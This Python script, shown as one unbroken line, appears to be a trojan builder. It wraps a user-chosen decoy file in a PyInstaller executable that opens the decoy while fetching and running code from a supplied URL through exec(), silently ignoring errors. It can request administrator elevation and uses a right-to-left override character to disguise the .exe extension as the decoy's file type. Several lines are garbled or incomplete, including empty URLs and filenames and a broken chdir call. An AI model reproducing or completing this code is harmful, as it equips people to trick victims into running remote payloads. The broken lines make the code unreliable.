from tkinter.filedialog import askopenfilename , askdirectory from tkinter.simpledialog import askstring from tkinter.messagebox import showwarning , askyesno from shutil import move from os import chdir from subprocess import Popen , PIPE , DEVNULL from PIL import Image from PyInstaller.utils.hooks import collect_submodules from requests import get from tempfile import TemporaryDirectory def add_modules()->list: while True: items = [] item = askstring("module","Enter the modules") if item and item.strip() != "": items.append(item.strip()) else: return items def add_submodules()->list: while True: items = [] item = askstring("submodule","Enter the submodules") if item and item.strip() != "": items.append(item.strip()) else: return items if Popen("pyinstaller",stderr=PIPE).communicate()[0]: if not Popen("python -m pip",stderr=PIPE).communicate()[0]: Popen("python -m pip install pyinstaller",stderr=DEVNULL,stdout=DEVNULL).communicate() else: open("pythondownload.exe","w+").write(get("").raw) showwarning("Python is required to run this program") Popen("pythondownload.exe",stdout=DEVNULL,stderr=DEVNULL).communicate() Popen("python -m pip install pyinstaller",stderr=DEVNULL,stdout=DEVNULL).communicate() tempfolder = TemporaryDirectory() chdir([("Image",["*.jpg","*.png","*.jpeg","*.ico"])])).convert("RGBA").save("icon.ico", format="ICO", sizes=[(72, 72)]) filename = askopenfilename() linkofcode = askstring("link of code", "Enter the link of the code") newname = askstring("","Give name of file") modules = add_modules() submodules = add_submodules() if askyesno("import","Do you want to import all submodules of modules?"): allsubmodules = [] for i in modules: allsubmodules.extend(collect_submodules(i)) submodules = list(set(allsubmodules + submodules)) open("","a+").write(f''' from subprocess import Popen from os import chdir from time import sleep from sys import _MEIPASS as cdir chdir(cdir) Popen("{filename.split("/")[-1]}",shell=True).communicate() sleep(1) from tkinter.messagebox import showerror from requests import get try: exec(get("{linkofcode}",timeout=5).text) except Exception: pass ''') command = ['pyinstaller', '--noconfirm', '--onefile', '--windowed', '--icon', "icon.ico", '--name', 'software', '--add-data', f'{filename};.'] for mudule in modules: command.extend(["--hidden-import",mudule]) for module in submodules: command.extend(["--collect-submodules",module]) if askyesno("UAC","Do you want to run this program as administrator?"): command.append("--uac-admin") if askyesno("UAC","Do you want to run this program as Uiaccess?"): command.append("--uac-uiaccess") command.append("") Popen(command,shell=True,stdout=DEVNULL,stderr=DEVNULL).communicate() move("dist/software.exe",f"{askdirectory}/{newname}\u202E{filename.split('.')[-1][::-1]}.exe") tempfolder.cleanup()